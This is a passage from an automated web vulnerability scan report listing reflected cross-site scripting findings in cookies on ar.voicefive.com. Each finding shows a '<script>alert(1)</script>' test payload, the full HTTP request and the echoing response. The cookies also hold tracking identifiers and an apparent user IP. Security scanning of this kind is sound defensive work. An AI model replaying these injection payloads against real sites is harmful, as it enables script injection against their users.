COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
"ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '133f3f<script>alert(1)</script>1e9269f0574', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p9
...[SNIP]...

3.49. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 9d9d7<script>alert(1)</script>a917426b808 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105289d9d7<script>alert(1)</script>a917426b808', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.50. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f989f<script>alert(1)</script>c2d7913ec5b was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172f989f<script>alert(1)</script>c2d7913ec5b', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...

3.51. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101866669 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload a3957<script>alert(1)</script>d386d8ef993 was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "UID": '4a757a7-24.143.206.42-1305663172', "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&a3957<script>alert(1)</script>d386d8ef993', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...

3.52. http://ar.voicefive.com/b/node_rcAll.pli [ar_p101945457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload 60d46<script>alert(1)</script>aec37149a73 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&60d46<script>alert(1)</script>aec37149a73', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...

3.53. http://ar.voicefive.com/b/node_rcAll.pli [ar_p104567837 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 88eb1<script>alert(1)</script>6e1f2d203c5 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&88eb1<script>alert(1)</script>6e1f2d203c5', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.54. http://ar.voicefive.com/b/node_rcAll.pli [ar_p20101109 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload ae91f<script>alert(1)</script>9d1c4ccadb1 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&ae91f<script>alert(1)</script>9d1c4ccadb1', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

3.55. http://ar.voicefive.com/b/node_rcAll.pli [ar_p56282763 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 49e92<script>alert(1)</script>e9b3d058372 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&49e92<script>alert(1)</script>e9b3d058372; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; 